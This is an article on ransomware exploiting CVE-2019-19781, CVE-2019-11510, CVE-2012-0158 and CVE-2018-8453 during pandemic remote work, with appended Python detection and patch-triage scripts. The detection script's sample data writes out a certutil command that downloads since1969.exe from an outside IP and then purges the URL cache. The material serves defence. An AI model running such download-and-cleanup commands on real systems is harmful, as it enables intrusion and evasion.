As more employees work from home, attackers have more endpoints to target. These unpatched vulnerabilities in remote access tools and Windows make their job easier.

The biggest security trend for 2020 has been the increase in COVID-19-related phishing and other attacks targeting remote workers. New York City, for example, has gone from having to protect 80,000 endpoints to around 750,000 endpoints in its threat management since work-from-home edicts took place.

As noted in a recent Check Point Software Technologies mid-year review, "The first impact of the pandemic was the proliferation of malware attacks that used social engineering techniques with COVID-19 thematic lures for the delivery stage." Domain names were set up and parked with names relating to the pandemic. As workers started to use videoconferencing platforms, attacks moved on to Zoom, Teams and other videoconferencing platforms.

One disturbing trend is that 80% of the observed attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier, according to the Check Point report, and more than 20% of the attacks used vulnerabilities that are at least seven years old. This shows that we have a problem keeping our software up to date.

Ransomware remains a big threat in 2020, but what interested me in a recent SenseCy study was that the ransomware attacks it identified were not all triggered by Windows vulnerabilities. Attackers used vulnerabilities in tools used for remote access into Windows networks. These are the top four vulnerabilities the researchers identified:

CVE-2019-19781: Citrix Application Delivery Controller

CVE-2019-19781 impacts remote access appliances manufactured by Citrix. It was disclosed in December 2019 and fixed in January 2020. Attackers use the Citrix vulnerability as an entry point and then pivot to other Windows vulnerabilities to gain further access.
As noted in a FireEye blog post, the Ragnarok ransomware attacks used the Citrix vulnerability to gain entry and then used a native Windows tool that ships as part of Windows Certificate Services (certutil.exe) to download a binary (categorized as technique T1105, Ingress Tool Transfer, within MITRE's ATT&CK framework). The attackers then executed the downloaded binary since1969.exe, located in C:\Users\Public, and deleted the URL from the current user's certificate URL cache to cover their tracks.

To ensure that your Citrix Gateway appliances are not impacted by this vulnerability, download and use the FireEye/Citrix scanner tool located on GitHub. This vulnerability has been tied to the introduction of Sodinokibi/REvil, Ragnarok, DoppelPaymer, Maze, CLOP and Nephilim ransomware.

Check Point reported similar trends in remote access. The use of remote access technologies including RDP and VPN led to a sharp rise in RDP brute force attacks.

CVE-2019-11510: Pulse Connect Secure

CVE-2019-11510 has been used and abused by many attackers for many things this year. Pulse Secure provides VPN connections to networks, and the use of the software dramatically increased as more people worked from home. An April blog post by Microsoft noted: "REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers – and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments."

The vulnerability was also used to capture and expose the passwords of more than 900 enterprise VPN servers. In June, Black Kingdom ransomware attacks also used the Pulse VPN vulnerability to launch an attack that spoofed a legitimate scheduled task for Google Chrome.

CVE-2012-0158: Microsoft Office Common Controls

The next of the four vulnerabilities that have caused the bulk of the ransomware attacks in 2020 is, amazingly enough, a vulnerability from years ago. CVE-2012-0158 was also a top vulnerability in 2019.
In March 2020, government and medical organizations were targeted with attacks trying to leverage this 2012 vulnerability by "sending a rich text format (RTF) document named '20200323-sitrep-63-covid-19.doc,' which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability (CVE-2012-0158) in Microsoft's ListView / TreeView ActiveX controls in MSCOMCTL.OCX library."

CVE-2018-8453: Windows Win32k component

CVE-2018-8453 is a 2018 vulnerability in the win32k.sys component of Windows. The Brazil-based energy company Light S.A. was hit with ransomware that used this vulnerability to escalate privileges by leveraging 32-bit and 64-bit exploits in the Win32k component of Windows.

A disturbing trend is the number and age of the vulnerabilities these attacks use. It shows the need to review patch management processes to ensure that you are patching your entry points and scanning for older vulnerabilities that patching tools might have missed.

It's time to review your environment. Have your endpoints increased due to the pandemic? Have you reviewed your access points to ensure they are patched, protected and monitored? Have you increased telemetry and helpdesk processes so that you are alerted to issues before they become incidents?

Take the time to step back and review where you are now. Can you patch better? Can you communicate better? Can you protect better?
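Two of the behaviours described earlier lend themselves to simple detections: the certutil download-then-purge-cache chain from the Ragnarok intrusions (ATT&CK T1105) and the rise in RDP brute force that Check Point reported. The following is an added example, not code from the article, FireEye or Check Point. The event dicts and their field names (ts, event_id, host, user, cmdline, logon_type, src_ip) are assumptions modelled loosely on Sysmon process-creation and Security-log 4625 records, and every record in it is constructed, not captured telemetry.

```python
"""Detection logic for certutil URL fetches (ATT&CK T1105) with a later
URL-cache purge, and for RDP brute force (Event ID 4625, logon type 10).
Added example; event layout and field names are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data).
EVENTS = [
    {"ts": "2020-06-01T10:00:01", "event_id": 1, "host": "WS01", "user": "CORP\\alice",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/since1969.exe C:\Users\Public\since1969.exe"},
    {"ts": "2020-06-01T10:00:02", "event_id": 1, "host": "WS01", "user": "CORP\\alice",
     "cmdline": r"C:\Users\Public\since1969.exe"},
    {"ts": "2020-06-01T10:00:03", "event_id": 1, "host": "WS01", "user": "CORP\\alice",
     "cmdline": r"certutil.exe -urlcache -delete http://198.51.100.7/since1969.exe"},
    {"ts": "2020-06-01T10:05:00", "event_id": 1, "host": "WS02", "user": "CORP\\bob",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},  # legitimate certutil use
] + [
    {"ts": f"2020-06-01T11:00:{i:02d}", "event_id": 4625, "host": "RDGW01",
     "user": f"CORP\\user{i}", "logon_type": 10, "src_ip": "203.0.113.5"}
    for i in range(25)
] + [
    {"ts": "2020-06-01T11:00:30", "event_id": 4625, "host": "RDGW01",
     "user": "CORP\\carol", "logon_type": 10, "src_ip": "10.0.0.9"},  # one typo, not an attack
]

PUBLIC_DIR = re.compile(r"\\users\\public\\", re.I)


def _tokens(cmdline):
    """Lower-case the command line and strip the leading '-' or '/' from
    switches; certutil accepts both spellings (-urlcache and /urlcache)."""
    return [t.lower().lstrip("-/") if t[0] in "-/" else t.lower()
            for t in cmdline.split()]


def _is_certutil(tokens):
    return bool(tokens) and tokens[0].rsplit("\\", 1)[-1] in ("certutil", "certutil.exe")


def detect_certutil_download(events):
    """Alert on certutil -urlcache -f <url> (T1105, Ingress Tool Transfer).
    Severity rises when the output lands under C:\\Users\\Public, the path
    used in the Ragnarok case; a later -urlcache -delete on the same host
    is recorded as cache cleanup."""
    alerts, purged_hosts = [], set()
    for e in events:
        if e["event_id"] != 1:
            continue
        toks = _tokens(e["cmdline"])
        if not _is_certutil(toks) or "urlcache" not in toks:
            continue
        if "delete" in toks:
            purged_hosts.add(e["host"])
            continue
        url = next((t for t in toks if t.startswith(("http://", "https://", "ftp://"))), None)
        if "f" in toks and url:
            alerts.append({
                "host": e["host"], "user": e["user"], "url": url,
                "technique": "T1105",
                "severity": "high" if PUBLIC_DIR.search(e["cmdline"]) else "medium",
            })
    for a in alerts:
        a["cache_purged"] = a["host"] in purged_hosts
    return alerts


def detect_rdp_bruteforce(events, threshold=20, window=timedelta(minutes=5)):
    """Return {src_ip: failures} for sources with at least `threshold` failed
    RDP logons (4625, logon type 10) inside any sliding `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625 and e.get("logon_type") == 10:
            by_src[e["src_ip"]].append(datetime.fromisoformat(e["ts"]))
    hits = {}
    for src, times in by_src.items():
        times.sort()
        start, worst = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst >= threshold:
            hits[src] = worst
    return hits


if __name__ == "__main__":
    for a in detect_certutil_download(EVENTS):
        print("certutil download:", a)
    print("rdp brute force:", detect_rdp_bruteforce(EVENTS))
```

The certutil rule keys on the switch combination rather than on the binary alone, because certutil is used legitimately (the -verify line above is ignored), and the brute-force rule counts failures per source in a sliding window so that a single mistyped password never trips it.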
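The patch management review the article closes with comes down to ranking what the scanner finds: the four CVEs it names first, then anything old enough to fall in the bucket Check Point's figures say is most exploited, then the rest. The block below is an added example of that triage, not code from the article or from any scanner vendor. Its CSV layout (host,cve,product) and the scan rows are constructed sample data; the two CVEs outside the article's list are real identifiers included only so the lower priority tiers have something in them.

```python
"""Triage of vulnerability-scanner findings by CVE age and by whether the
CVE is one of the four the article ties to 2020 ransomware intrusions.
Added example; CSV layout and rows are constructed."""
import csv
import io
import re
from datetime import date

# The four entry-point CVEs named in the article.
RANSOMWARE_ENTRY_CVES = {
    "CVE-2019-19781": "Citrix ADC / Gateway",
    "CVE-2019-11510": "Pulse Connect Secure",
    "CVE-2012-0158": "MSCOMCTL.OCX (Office common controls)",
    "CVE-2018-8453": "Windows win32k.sys",
}

# Constructed scanner output (assumed host,cve,product layout).
SAMPLE_SCAN = """host,cve,product
vpn-gw1,CVE-2019-11510,Pulse Connect Secure
adc1,CVE-2019-19781,Citrix ADC
ws-hr-07,cve-2012-0158,Office 2010 MSCOMCTL.OCX
ws-fin-12,CVE-2018-8453,Windows 10
ws-fin-12,CVE-2020-0796,Windows 10
web1,CVE-2017-5638,Apache Struts 2
"""

CVE_RE = re.compile(r"^CVE-(\d{4})-\d{4,}$")


def cve_year(cve):
    """Year field of a CVE ID (the year it was reserved, a usable lower
    bound on how long a fix has existed). Rejects malformed IDs instead
    of silently treating them as new."""
    m = CVE_RE.match(cve.strip().upper())
    if not m:
        raise ValueError(f"not a CVE identifier: {cve!r}")
    return int(m.group(1))


def triage(csv_text, today=date(2020, 8, 1), stale_years=3):
    """Rank findings: 0 = known ransomware entry point, 1 = at least
    stale_years old, 2 = everything else. Within a tier, oldest first."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cve = row["cve"].strip().upper()
        age = today.year - cve_year(cve)
        priority = 0 if cve in RANSOMWARE_ENTRY_CVES else 1 if age >= stale_years else 2
        findings.append({
            "host": row["host"], "cve": cve, "product": row["product"],
            "age_years": age, "priority": priority,
            "reason": RANSOMWARE_ENTRY_CVES.get(cve, f"{age}-year-old CVE"),
        })
    findings.sort(key=lambda f: (f["priority"], -f["age_years"], f["host"]))
    return findings


def registered_by(findings, year=2017):
    """(count, total) of findings whose CVE year is <= `year`, to compare
    against the 80% figure from the Check Point mid-year review."""
    old = sum(1 for f in findings if cve_year(f["cve"]) <= year)
    return old, len(findings)


if __name__ == "__main__":
    ranked = triage(SAMPLE_SCAN)
    for f in ranked:
        print(f["priority"], f["host"], f["cve"], f["reason"])
    print("registered 2017 or earlier: %d of %d" % registered_by(ranked))
```

Run against real scanner exports, the first tier is the list to patch this week regardless of CVSS score, and the registered_by ratio is a quick check on whether your own backlog looks like the one Check Point described.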